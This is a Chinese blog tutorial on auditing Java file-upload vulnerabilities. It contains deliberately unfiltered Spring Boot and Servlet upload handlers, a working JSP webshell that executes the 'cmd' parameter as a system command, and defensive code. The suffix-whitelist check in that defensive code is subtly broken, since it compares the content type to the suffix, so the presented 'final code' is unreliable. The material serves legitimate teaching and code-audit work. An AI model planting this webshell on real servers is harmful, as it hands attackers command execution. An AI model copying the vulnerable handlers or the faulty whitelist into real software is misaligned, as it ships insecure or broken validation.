[Java代码审计]—文件上传漏洞

最新推荐文章于 2024-05-19 09:45:05 发布
最新推荐文章于 2024-05-19 09:45:05 发布
阅读量3.9k 收藏 17
点赞数 4
分类专栏: Java 文章标签: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54902210/article/details/127700409
版权

环境配置

Springboot:2.7.5

依赖

<dependencies>
    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-web</artifactId>
    </dependency>

    <dependency>
        <groupId>org.springframework.boot</groupId>
        <artifactId>spring-boot-starter-test</artifactId>
        <scope>test</scope>
    </dependency>

    <dependency>
        <groupId>org.apache.tomcat.embed</groupId>
        <artifactId>tomcat-embed-jasper</artifactId>
    </dependency>

    <dependency>
        <groupId>commons-fileupload</groupId>
        <artifactId>commons-fileupload</artifactId>
        <version>1.2.2</version>
    </dependency>
    
    <dependency>
        <groupId>commons-io</groupId>
        <artifactId>commons-io</artifactId>
        <version>2.0.1</version>
    </dependency>
</dependencies>

application.yml

spring:
  mvc:
    view:
      prefix: /WEB-INF/jsp/
      suffix: .jsp
  web:
    resources:
      static-locations: classpath:/templates/


server:
  port: 8081

前置知识

multipart/form-data

multipart/form-data这种编码方式的表单会以二进制流的方式来处理表单数据,这种编码方式会把文件域指定文件的内容也封装到请求参数里。通常会见到配合method=post去搭配使用,而后端采取inputstream等方式读取客户端传入的二进制流来处理文件。

00截断问题

PHP中:PHP<5.3.29,且GPC关闭

Java中:

同时考虑到00截断绕过的问题,在JDK1.7.0_40(7u40)开始对\00进行了检查:

final boolean isInvalid(){
    if(status == null){
        status=(this.path.indexOf('\u0000')<0)?PathStatus.CHECKED:PathStatus.INVALID;
    }
    return status == PathStatus.INVALID;
}

在7u40后这个问题也就修复了

表单中的enctype

  • application/x-www-form-urlencoded:默认编码方式,只处理表单中的value属性值,这种编码方式会将表单中的值处理成URL编码方式
  • multipart/form-data:以二进制流的方式处理表单数据,会把文件内容也封装到请求参数中,不会对字符编码
  • text/plain:把空格转换为+ ,当表单action属性为mailto:URL形式时比较方便,适用于直接通过表单发送邮件方式

处理文件时常用方法

separatorChar

主要用来做分隔符,防止因为跨平台时各个操作系统之间分隔符不一样出现问题

public static final char separatorChar

与系统有关的默认名称分隔符。此字段被初始化为包含系统属性 file.separator 值的第一个字符。在 UNIX 系统上,此字段的值为 ‘/’;在 Microsoft Windows 系统上,它为 ‘\’

separator

主要用来做分隔符,防止因为跨平台时各个操作系统之间分隔符不一样出现问题

public static final String separator = "" + separatorChar;

其实separator是由separatorChar转换成的,所以只是类型不同

equalsIgnoreCase

将字符串与指定的对象比较,不考虑大小写。文件上传中主要用于判断文件文件后缀名

可以与equlas对比来看,s1和s2只有大小写不同,如果用equals则返回false,equalsIgnoreCase返回true

String s1 = "SENTIMENT";
String s2 = "sentiment";
System.out.println(s1.equals(s2));              //false
System.out.println(s1.equalsIgnoreCase(s2));    //true

常见文件上传方式

文件流上传

@RequestMapping("/upload1")
public String fileUpload(@RequestParam("file") MultipartFile file, HttpServletRequest request) throws IOException {
    String path = request.getServletContext().getRealPath("upload");
    String filename = file.getOriginalFilename();
    if (file.isEmpty()) {
        return "请上传文件";
    }
    try {
        OutputStream fos = new FileOutputStream(path + "/" + filename);
        InputStream fis = file.getInputStream();
        int len;
        while ((len = fis.read()) != -1) {
            fos.write(len);
        }
        fos.flush();
        fos.close();
        fis.close();
        return "Success!";
    } catch (FileNotFoundException e) {
        e.printStackTrace();
    }
    return "";
}

上传入口

<h1>文件流上传</h1>
<form method="POST" enctype="multipart/form-data" action="http://127.0.0.1:8081/upload1">
  <input type="file" name="file">
  <input type="submit" name="submit">
</form>

MultipartFile方式上传

MultipartFile常用方法

  • String getOriginalFilename():获取上传文件的原名
  • InputStream getInputStream():获取文件流
  • void transferTo(File dest):将上传文件保存到一个目录文件中
  • String getContentType():获取上传文件的MIME类型
@RequestMapping("/file2")
public String MultiFileUpload(@RequestParam("file") MultipartFile file ,HttpServletRequest request) {
    if (file.isEmpty()) {
        return "请上传文件";
    }
    String filePath = request.getServletContext().getRealPath("upload");
    String fileName = file.getOriginalFilename();

    File dest = new File(filePath + File.separator + fileName);
    if (!dest.getParentFile().exists()) {
        dest.getParentFile().mkdirs();
    }
    try {
        file.transferTo(dest);
        return "Success!";
    } catch (IOException e) {
        e.printStackTrace();
    }
    return "";
}

若要对上传内容进行限制则可设置:

springboot

spring:
  servlet:
    multipart:
      enabled: true
      # 单文件大小
      max-file-size: 100MB
      # 文件达到多少磁盘写入
      file-size-threshold: 4MB

springmvc

<bean id="multipartResolver" class="org.springframework.web.multipart.commons.CommonsMultipartResolver">
	<!--        需要与jsp中的pageEncoding配置一致,默认为iso-8859-1-->
    <property name="defaultEncoding" value="utf-8"/>
	<!--   单文件大小,单位为字节10485700=100M-->
    <property name="maxUploadSize" value="10485700"/>
    <!--   文件达到多少磁盘写入-->
    <property name="maxInMemorySize" value="409600"/>
</bean>

上传入口

<h1>MultipartFile上传</h1>
<form method="POST" enctype="multipart/form-data" action="http://127.0.0.1:8081/upload2">
  <input type="file" name="file">
  <input type="submit" name="submit">
</form>

ServletFileUpload上传

基于Commons-FileUpload组件

依赖

<dependency>
    <groupId>commons-fileupload</groupId>
    <artifactId>commons-fileupload</artifactId>
    <version>1.2.2</version>
</dependency>

Springboot环境需关闭multipart

spring:
  servlet:
    multipart:
      enabled: false

创建步骤

  • 创建磁盘工厂:DiskFileItemFactory factory = new DiskFileItemFactory();
  • 创建处理工具:ServletFileUpload upload = new ServletFileUpload(factory);
  • 设置上传文件大小:upload.setFileSizeMax(3145728);
  • 接收全部内容:List items = upload.parseRequest(request);
@RequestMapping("/upload3")
protected void ServletFileUpload(HttpServletRequest request, HttpServletResponse response) throws IOException {
    {
        //设置文件上传路径
        String filePath = request.getServletContext().getRealPath("upload");
        File uploadFile = new File(filePath);
        //若不存在该路径则创建之
        if (!uploadFile.exists() && !uploadFile.isDirectory()) {
            uploadFile.mkdir();
        }


        try {
            //创建一个磁盘工厂
            DiskFileItemFactory factory = new DiskFileItemFactory();
            //创建文件上传解析器
            ServletFileUpload fileupload = new ServletFileUpload(factory);
            //三个照顾要上传的文件大小
            fileupload.setFileSizeMax(3145728);
            //判断是否为multipart/form-data类型,为false则直接跳出该方法
            if (!fileupload.isMultipartContent(request)) {
                return;
            }
            //使用ServletFileUpload解析器解析上传数据,解析结果返回的是一个List<FileItem>集合,每一个FileItem对应一个Form表单的输入项
            List<FileItem> items = fileupload.parseRequest(request);
            for (FileItem item : items) {
                //isFormField方法用于判断FileItem类对象封装的数据是否属于一个普通表单字段,还是属于一个文件表单字段,如果是普通表单字段则返回true,否则返回false。
                if (item.isFormField()) {
                    String name = item.getFieldName();
                    //解决普通输入项的数据的中文乱码问题
                    String value = item.getString("UTF-8");
                    String value1 = new String(name.getBytes("iso8859-1"), "UTF-8");
                    System.out.println(name + " : " + value);
                    System.out.println(name + " : " + value1);
                } else {
                    //获得上传文件名称
                    String fileName = item.getName();
                    System.out.println(fileName);
                    if (fileName == null || fileName.trim().equals("")) {
                        continue;
                    }
                    //注意:不同的浏览器提交的文件名是不一样的,有些浏览器提交上来的文件名是带有路径的,如:  c:\a\b\1.txt,而有些只是单纯的文件名,如:1.txt
                    //处理获取到的上传文件的文件名的路径部分,只保留文件名部分
                    fileName = fileName.substring(fileName.lastIndexOf(File.separator) + 1);
                    //获取item中的上传文件的输入流
                    InputStream is = item.getInputStream();
                    FileOutputStream fos = new FileOutputStream(filePath + File.separator + fileName);
                    byte buffer[] = new byte[1024];
                    int length = 0;
                    while ((length = is.read(buffer)) > 0) {
                        fos.write(buffer, 0, length);
                    }
                    is.close();
                    fos.close();
                    item.delete();
                }
            }
            response.getWriter().write("Success!");
        } catch (FileUploadException e) {
            e.printStackTrace();
        }
    }
}

上传入口

<h1>ServletFileUpload上传</h1>
<form method="POST" enctype="multipart/form-data" action="http://127.0.0.1:8081/upload3">
  <input type="file" name="file">
  <input type="submit" name="submit">
</form>

Servlet Part上传

Servlet3之后,有提出了request.getParts()获取上传文件的方式。

除此外若加上注解@MultipartConfig,则可定义一些上传属性

方法类型是否可选作用
fileSizeThersholdint当前数据量大于该值时,内容将被写入文件
locationString存放文件的路径
maxFileSizelong允许上传的文件最大值,默认为-1,表示没有限制
maxRequestSizelong针对multipart/form-data 请求的最大数量,默认为-1,表示没有限制

ServletPart常用方法

  • String getName()  获取这部分的名称,例如相关表单域的名称
  • String getContentType()  如果Part是一个文件,那么将返回Part的内容类型,否则返回null(可以利用这一方法来识别是否为文件域)
  • Collection getHeaderNames()  返回这个Part中所有标头的名称
  • String getHeader(String headerName)  返回指定标头名称的值
  • void write(String path)  将上传的文件写入服务器中项目的指定地址下,如果path是一个绝对路径,那么将写入指定的路径,如果path是一个相对路径,那么将被写入相对于location属性值的指定路径。
  • InputStream getInputStream()  以inputstream的形式返回上传文件的内容
@RequestMapping("/upload4")
public void ServletPartUpload(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    String filePath = request.getServletContext().getRealPath("upload");
    File uploadFile = new File(filePath);
    //若不存在该路径则创建之
    if (!uploadFile.exists() && !uploadFile.isDirectory()) {
        uploadFile.mkdir();
    }
    //通过表单中name属性值,获取filename
    Part part = request.getPart("file");
    if(part == null) {
        return ;
    }
    String filename = filePath + File.separator + part.getSubmittedFileName();
    part.write(filename);
    part.delete();
}

文件上传入口

<h1>ServletPart上传</h1>
<form method="POST" enctype="multipart/form-data" action="http://127.0.0.1:8081/upload4">
  <input type="file" name="file">
  <input type="submit" name="submit">
</form>

文件上传漏洞

上述都是no waf的文件上传方式,若不做任何防御的情况下,可以实现任意文件上传,造成文件上传漏洞

通过上述任意方法,上传jsp马

<%
        java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();
        int a;
        byte[] b = new byte[1024];
        out.print("<pre>");
        while((a=in.read(b))!=-1){
            out.println(new String(b,0,a));
        }
%>

执行成功
在这里插入图片描述

防御

content-type白名单

//1、MIME检测
    String contentType = file.getContentType();
    String[] white_type = {"image/gif","image/jpeg","image/jpg","image/png"};
    Boolean ctFlag = false;
    for (String suffix:white_type){
        if (contentType.equalsIgnoreCase(suffix)){
            ctFlag = true;
            break;
        }
    }
    if (!ctFlag){
        return "content-type not allow";
    }

如果单设置这一个的话其实很好绕过

重命名文件

可以用uuid、md5、时间戳等方式

//2、重命名文件
String uuid = UUID.randomUUID().toString();
fileName = uuid+fileName.substring(fileName.lastIndexOf("."));;

后缀白名单

//3、后缀白名单
String fileSuffix = fileName.substring(fileName.lastIndexOf("."));
String[] white_suffix = {"gif","jpg","jpeg","png"};
Boolean fsFlag = false;
for (String suffix:white_suffix){
    if (contentType.equalsIgnoreCase(fileSuffix)){
        fsFlag = true;
        break;
    }
}
if (!fsFlag){
    return "suffix not allow";
}

绕过MIME检测后,可以通过白名单进行进一步的防御
在这里插入图片描述

修改存储位置

可以将图片存放到不可访问的路径,例如:Servlet的WEB-INF下,默认情况是访问不到的

//4、修改存储位置
String filePath = request.getServletContext().getRealPath("/WEB-INF/upload");

最终代码

 public String MultiFileUpload(@RequestParam("file") MultipartFile file ,HttpServletRequest request) {
        if (file.isEmpty()) {
            return "请上传文件";
        }

//        String filePath = request.getServletContext().getRealPath("upload");
        String fileName = file.getOriginalFilename();
        //1、MIME检测
        String contentType = file.getContentType();
        String[] white_type = {"image/gif","image/jpeg","image/jpg","image/png"};
        Boolean ctFlag = false;
        for (String suffix:white_type){
            if (contentType.equalsIgnoreCase(suffix)){
                ctFlag = true;
                break;
            }
        }
        if (!ctFlag){
            return "content-type not allow";
        }
        //2、重命名文件
        String uuid = UUID.randomUUID().toString();
        fileName = uuid+fileName.substring(fileName.lastIndexOf("."));;
        //3、后缀白名单
        String fileSuffix = fileName.substring(fileName.lastIndexOf("."));
        String[] white_suffix = {"gif","jpg","jpeg","png"};
        Boolean fsFlag = false;
        for (String suffix:white_suffix){
            if (contentType.equalsIgnoreCase(fileSuffix)){
                fsFlag = true;
                break;
            }
        }
        if (!fsFlag){
            return "suffix not allow";
        }
        //4、修改存储位置
        String filePath = request.getServletContext().getRealPath("/WEB-INF/upload/");
        File dest = new File(filePath + File.separator + fileName);
        if (!dest.getParentFile().exists()) {
            dest.getParentFile().mkdirs();
        }
        try {
            file.transferTo(dest);
            return "Success!";
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "";
    }

代码审计中常见文件上传关键字

DiskFileItemFactory
@MultipartConfig
MultipartFile
File
upload
InputStream
OutputStream
write
fileName
filePath

参考链接

Java审计之文件上传 - Zh1z3ven - 博客园 (cnblogs.com)

javasec_study/java代码审计-文件操作.md at master · proudwind/javasec_study (github.com)

JAVA审计-文件上传 - N0r4h - 博客园 (cnblogs.com)

《网络安全Java代码审计实战》

S1nJa
关注
  • 4
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Java代码审计】文件操作篇
大河之犬的博客
12-15 666
文件上传漏洞Java 文件操作中比较常见的一种漏洞,是指攻击者利用系统缺陷绕过对文件的验证和处理,将恶意文件上传到服务器并进行利用。这种漏洞形成原因多样,危害巨大,往往可以通过文件上传直接拿到服务器的 webshell文件上传漏洞的本质还是未对文件名做严格校验,常见的主要有如下几种情况:未对文件做任何过滤,仅在前端通过 js 检验, 只判断了 Content-Type,后缀过滤不全,读取后缀方式错误等。
文件上传漏洞
Enya1122的博客
02-04 1016
文件上传漏洞基础知识
探索 Spring Boot 写文件漏洞:从概念验证到实战应用
gitblog_00077的博客
05-19 232
探索 Spring Boot 写文件漏洞:从概念验证到实战应用 项目地址:https://gitcode.com/LandGrey/spring-boot-upload-file-lead-to-rce-tricks 在网络安全的世界里,每一个漏洞都可能成为攻击者发起攻击的入口。今天,我们将深入探讨一个关于Spring Boot框架的写文件漏洞,并通过一个开源项目——spring-boot-upl...
记一次springboot项目漏洞挖掘
YJ_12340的博客
05-08 1431
本文测试是在该cms旧版本上进行的,新版本对已有问题已进行了修复,这次对该java实现的cms漏洞挖掘收获满满,对cms安装、部署以及代码审计中要注意的点得到了良好的锻炼。
代码审计】—JAVA项目注入、上传、插件挖掘
haoaaao的博客
08-06 522
代码审计】—JAVA项目注入、上传、插件挖掘
Java代码漏洞检测-常见漏洞与修复建议
晨港飞燕的专栏
11-19 6129
在工作中,我们的交付团队在交付项目时,可能会遇到甲方会使用一些第三方工具(奇安信等)对项目代码进行扫描,特别是一些对安全性要求比较高的企业,比如涉及到一些证券公司、银行、金融等。他们会在项目上线前进行代码安全检测,通过了对方才会发布上线。原文链接:https://blog.csdn.net/qq_39560975/article/details/131956264。
java web 上传图片漏洞_Web安全:文件上传漏洞
weixin_29310631的博客
02-17 1065
原标题:Web安全:文件上传漏洞一般将文件上传归类为直接文件上传与间接文件上传。直接文件上传就是服务器根本没有做任何安全过滤,导致攻击者可以直接上传小马文件及大马文件(如ASP、ASPX、PHP、JSP及war文件等类型的小马文件及大马文件),从而得到目标站点的shell。间接文件上传就是服务器对用户上传的文件使用了安全策略:第一种安全策略是在程序代码中设置黑名单或者白名单;第二种安全策略是在We...
Java代码审计思维导图
03-23
第一类:常见web漏洞,涵盖了SQL注入,XSS注入,链接注入,文件上传,反序列化,SSRF的漏洞成因,漏洞审计以及漏洞修复 第二类:业务逻辑漏洞,涵盖了逻辑漏洞,短信漏洞,验证码漏洞漏洞成因,漏洞审计以及漏洞...
41-谈一谈java代码审计1
08-03
Java代码审计是确保软件安全的重要环节,特别是在使用广泛且功能强大的Java编程语言时。Java因其面向对象、跨平台和多线程的特性成为许多企业级应用的首选,但随之而来的便是安全问题。本文将围绕Java代码审计的关键...
Java代码审计综合实验-jeecg-3-8
10-28
Java代码审计是一项重要的安全实践,它涉及到对Java应用程序的源代码进行审查,以发现潜在的安全漏洞和编程错误。在这个综合实验“Java代码审计——jeecg-3.8”中,我们将聚焦于Jeecg CMS系统的审计过程。Jeecg CMS...
Java代码审计工程师 视频教程 下载 百度网盘链接4.zip
最新发布
06-19
├─20.实验课程作业 │ 10_业务逻辑漏洞.pdf │ 11_SQL注入漏洞.pdf │ 12_文件上传&目录遍历漏洞.pdf │ 13_命令执行(代码执行).pdf ...代码审计及SDL岗位面试总结.pdf 9.XSS漏洞审计.pdf
spring-boot-upload-file-lead-to-rce-tricks:spring boot Fat Jar 应用文件上传漏洞到 RCE 的利用技巧
04-12
spring-boot-upload-file-lead-to-rce-tricks 一. docker 漏洞环境搭建 docker pull landgrey/spring-boot-fat-jar-write-file-rce:1.2 docker run -d -p 18081:18081 landgrey/spring-boot-fat-jar-write-file-rce:1.2 完成后访问 二. 相关文章 三. 常见 JDK 目录收集 欢迎提 issue 补充:clapping_hands:~ /usr/lib/jvm/java-8-oracle/jre/lib/ /usr/lib/jvm/java-1.8-openjdk/jre/lib/ /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ 四. docker 漏洞环境的功能 文件上传功能 (默认上传到 /tmp/ 目录,
上传文件漏洞总结
01-10
上传文件的总结上传文件的总结上传文件的总结上传文件的总结
第55天:代码审计-JAVA项目注入上传搜索或插件挖掘1
08-03
在本文中,我们将深入探讨Java项目中的代码审计,特别是关注注入攻击、上传漏洞以及相关的工具使用。这些安全问题在开发过程中不容忽视,因为它们可能导致数据泄露、系统瘫痪甚至整个网络的破坏。 首先,我们来看一...
spring框架漏洞整理(Springboot漏洞)
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
11-01 4069
2016年爆出的一个漏洞,Springboot漏洞利用条件 至少知道一个触发 springboot 默认错误页面的接口及参数名 利用方法 Springboot漏洞步骤一:找到一个正常传参处 比如发现访问/article?id=xxx,页面会报状态码为 500 的错误:Whitelabel Error Page,则后续 payload 都将会在参数 id 处尝试。 Springboot漏洞步骤二:执行 SpEL 表达式
《WEB安全漏洞30讲》(第5讲)任意文件上传漏洞
午夜安全
05-22 3322
文件上传漏洞,指攻击者利用程序缺陷绕过系统对文件的验证与处理策略将恶意程序上传到服务器并获得执行服务器端命令的能力。这个漏洞其实非常简单,就是攻击者给服务器上传了恶意的木马程序,然后利用此木马程序执行操作系统命令,从而获得服务器权限,造成严重的安全隐患。比如一个JAVA系统本来需要上传身份证图片进行用户实名认证,结果恶意用户上传了jsp木马文件,之后利用这个文件执行系统命令,再以这个系统为据点,对内网其他互通的系统进行攻击,这样将导致整个内网系统的沦陷。
文件上传漏洞攻击与防范方法
MachineGunJoe666
07-24 1188
写在文本xx.txt中(或者shell语句直接写一句话木马,用菜刀、cknife等直连,只是容易被查杀),然后用命令将shell语句附加在正常图片xx.jpg后copy xx.jpg/b + xx.txt/a test.jpg上传test.jpg,然后访问test.jpg/.php或test.jpg/abc.php当前目录下就会生成一句话木马 shell.php。文件上传攻击的本质就是将恶意文件或者脚本上传到服务器,专业的安全设备防御此类漏洞主要是通过对漏洞的上传利用行为和恶意文件的上传过程进行检测。
漏洞解决方案-文件上传
smart的博客
08-10 5625
漏洞解决方案-文件上传漏洞概述安全措施限制文件扩展名检查文件头格式文件内容检查随机命名文件非WEB目录存储代码参考 漏洞概述 非法的文件上传是黑客最常用的攻击手段之一,如果允许黑客向某个可通过 Web 访问的目录上传文件,并能够将这些文件传递给代码解释器,它会给正常的系统中执行恶意的代码文件(通常这种恶意代码叫做:WebShell),通过执行恶意的WebShell获取相应权限,来控制整个主机系统。 安全措施 限制文件扩展名 检查上传的文件扩展名是否为预期的扩展名文件,拒绝接收任何非预期的扩展名文件。 检查文
基于SpringBoot项目的漏洞修复经验
qq_27624807的博客
05-17 1860
漏洞修复

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值